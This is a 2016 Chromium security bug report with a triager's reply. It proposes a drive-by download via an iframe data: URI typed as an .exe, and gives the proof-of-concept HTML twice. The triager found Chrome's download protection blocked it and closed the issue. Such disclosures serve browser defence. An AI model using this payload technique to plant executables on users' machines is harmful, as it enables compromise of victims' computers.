Issue metadata
Sign in to add a comment
|
Security: Download .exe file on any computer
Reported by
pabster...@gmail.com,
Mar 1 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Download any .exe file on victim computer via data: and iframe:
<head>
</head>
<body>
<iframe src='data:application/x-msdownload;base64,a2poYWxrc2hkbGtoYXNka2xoYXNsa2RoYWxraGtoYWxza2hka2xzamFoZGxramhhc2xka2hhc2xrZGgKYXNrZGpoa2FzZGpoYWtzaGRrYXNoZGtoYXNrZGhhc2tkaGthc2hka2Foc2RraGFrc2hka2FzaGRraGFzCmFza2pkaGFrc2hkbSxjbmtzamFoZGtoYXNrZGhhc2tka2hrYXNkCjg3MzQ2ODEyNzQ2OGtqc2hka2FoZHNrZGhraApha3NqZGthc2Roa3NkaGthc2hka2FzaGtkaAohISomXkAqJl4qYWhpZGFzeWRpeWlhc1xcb1wKa2Fqc2Roa2FzaGRrYXNoZGsKYWtzamRoc2tkaAplbmQK
'>
</body>
Should get blocked, but it doesn't, .exe gets downloaded.
VERSION
Chrome Version: Newest
Operating System: Macintosh
REPRODUCTION CASE
You could use this to get a .exe file on anybodies computer without their permission or their knowing, it could compromise the victims computer completely and could lead to complete host takeover.
HTML:
<head>
</head>
<body>
<iframe src='data:application/x-msdownload;base64,a2poYWxrc2hkbGtoYXNka2xoYXNsa2RoYWxraGtoYWxza2hka2xzamFoZGxramhhc2xka2hhc2xrZGgKYXNrZGpoa2FzZGpoYWtzaGRrYXNoZGtoYXNrZGhhc2tkaGthc2hka2Foc2RraGFrc2hka2FzaGRraGFzCmFza2pkaGFrc2hkbSxjbmtzamFoZGtoYXNrZGhhc2tka2hrYXNkCjg3MzQ2ODEyNzQ2OGtqc2hka2FoZHNrZGhraApha3NqZGthc2Roa3NkaGthc2hka2FzaGtkaAohISomXkAqJl4qYWhpZGFzeWRpeWlhc1xcb1wKa2Fqc2Roa2FzaGRrYXNoZGsKYWtzamRoc2tkaAplbmQK
'>
</body>
,
Mar 1 2016
Thanks for reporting, pabstersac! On my mac with the latest chrome 48.0.2564.109, the download.exe is corrected caught by download protection. I will mark this bug as won'tfix for now since I cannot reproduce it. But feel free to reopen it if you can provide us test cases that do not trigger download warnings. Many thanks!
,
Jun 8 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by pabster...@gmail.com
, Mar 1 2016